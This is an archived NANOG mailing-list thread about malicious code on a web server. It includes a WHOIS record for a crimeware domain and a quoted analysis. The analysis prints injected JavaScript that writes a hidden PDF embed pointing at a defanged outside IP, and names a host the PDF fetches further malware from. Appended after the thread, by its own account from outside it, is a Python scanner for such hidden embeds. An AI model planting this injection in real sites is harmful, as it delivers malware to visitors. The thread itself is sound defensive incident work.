Malicious code just found on web server

Jake Mailinglists jbabbinlists at gmail.com
Mon Apr 20 14:42:52 UTC 2009


Paul,
I noticed that in the PDF file but as the domain doesn't seem to have
resolution I didn't mention it.

Jake

WHOIS information on the domain

Whois Record

domain:     TEST1.RU
type:       CORPORATE
nserver:    ns1.centerhost.ru.
nserver:    ns1.cetis.ru.
state:      REGISTERED, DELEGATED
org:        Center of Effective Technologies and Systems CETIS
phone:      +7 4957711654
fax-no:     +7 4957879251
e-mail:     <http://www.domaintools.com/registrant-search/?email=f6261250d87c80094b7a5eb64d324e5a>
e-mail:     <http://www.domaintools.com/registrant-search/?email=acac76ec2f649d85219bdf7879b125ff>
registrar:  REGRU-REG-RIPN
created:    2001.03.30
paid-till:  2010.04.03
source:     TC-RIPN

Registry Data
  Created:       2001-03-30
  Expires:       2010-04-03
  Whois Server:  whois.ripn.net
Server Data
  Domain Status: Registered And No Website

On Fri, Apr 17, 2009 at 9:06 PM, Paul Ferguson <fergdawgster at gmail.com> wrote:

>
>  On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills <securinate at gmail.com>
> wrote:
>
>
> >> I took a quick look at the code... formatted it in a pastebin here:
> >> http://pastebin.com/m7b50be54
> >>
> >> That javascript writes this to the page (URL obscured):
> >> document.write("<embed
> >> src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|Unknown|US|1.2.3.4\"
> >> width=\"0\" height=\"0\" type=\"application/pdf\"></embed>");
> >>
> >> The 1.2.3.4 in the URL is my public IP address (I changed that).
> >>
> >> Below the javascript, it grabs a PDF:
> >> <embed src="include/two.pdf" width="1" height="0"
> >> style="border:none"></embed>
> >>
> >> That PDF is on the site, I haven't looked at it yet though.
> >>
>
> Not only is that .pdf malicious, when "executed" it also fetches additional
> malware from:
>
> hxxp:// test1.ru /1.1.1/load.php
>
> If that host is not in your block list, it should be -- known purveyor of
> crimeware.
>
> This is in addition to the other malicious URLs mentioned in this thread.
>
> - - ferg
>
>
> --
> "Fergie", a.k.a. Paul Ferguson
>  Engineering Architecture for the Internet
>  fergdawgster(at)gmail.com
>  ferg's tech blog: http://fergdawg.blogspot.com/
>
>
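The pattern Chris describes above, a document.write() that injects a zero-size PDF <embed> alongside a static 1x0 <embed>, is something a defender can scan for in served pages. The following is an added example, not code from anyone in this thread: it pulls embed-like tags out of both the static markup and document.write() string literals, then flags the hidden ones that load a PDF. The sample page, hostnames and IP addresses are constructed (documentation ranges), not the thread's indicators.

```python
import re
from html.parser import HTMLParser

# Constructed sample modelled on the thread: a document.write() that injects a
# zero-size PDF embed, a static 1x0 embed for a local PDF, and a benign viewer.
SAMPLE_HTML = r'''<html><body>
<script>
document.write("<embed src=\"http://203.0.113.10/inc/spl.php?stat=Unknown|US|198.51.100.7\" width=\"0\" height=\"0\" type=\"application/pdf\"></embed>");
</script>
<embed src="include/two.pdf" width="1" height="0" style="border:none"></embed>
<embed src="brochure.pdf" width="600" height="400" type="application/pdf"></embed>
</body></html>'''

# Matches document.write("...") with a double-quoted literal containing JS escapes.
DOC_WRITE_RE = re.compile(r'document\.write\(\s*"((?:[^"\\]|\\.)*)"\s*\)')

def unescape_js(s):
    """Undo simple JS string escapes (\\" \\\\ \\/) used inside the literal."""
    return re.sub(r'\\(.)', r'\1', s)

class EmbedCollector(HTMLParser):
    """Collects attribute dicts of embed-like start tags."""
    def __init__(self):
        super().__init__()
        self.embeds = []
    def handle_starttag(self, tag, attrs):
        if tag in ('embed', 'object', 'iframe'):
            self.embeds.append(dict(attrs))

def collect_embeds(html):
    """Embed-like tags from static markup plus those hidden in document.write() literals."""
    outer = EmbedCollector()
    outer.feed(html)            # <script> bodies are CDATA, so no double counting
    for m in DOC_WRITE_RE.finditer(html):
        inner = EmbedCollector()
        inner.feed(unescape_js(m.group(1)))
        for e in inner.embeds:
            e['_via'] = 'document.write'
        outer.embeds.extend(inner.embeds)
    return outer.embeds

def is_hidden(attrs):
    """True when width or height is 0 or 1 pixel, the classic invisible-embed trick."""
    def dim(v):
        v = re.sub(r'px$', '', (v or '').strip())
        return int(v) if v.isdigit() else None
    w, h = dim(attrs.get('width')), dim(attrs.get('height'))
    return (w is not None and w <= 1) or (h is not None and h <= 1)

def suspicious_embeds(html):
    """Return (src, origin) for hidden embeds whose payload is a PDF by type or extension."""
    hits = []
    for e in collect_embeds(html):
        src = e.get('src') or ''
        is_pdf = e.get('type') == 'application/pdf' or src.split('?')[0].lower().endswith('.pdf')
        if is_hidden(e) and is_pdf:
            hits.append((src, e.get('_via', 'static')))
    return hits
```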



More information about the NANOG mailing list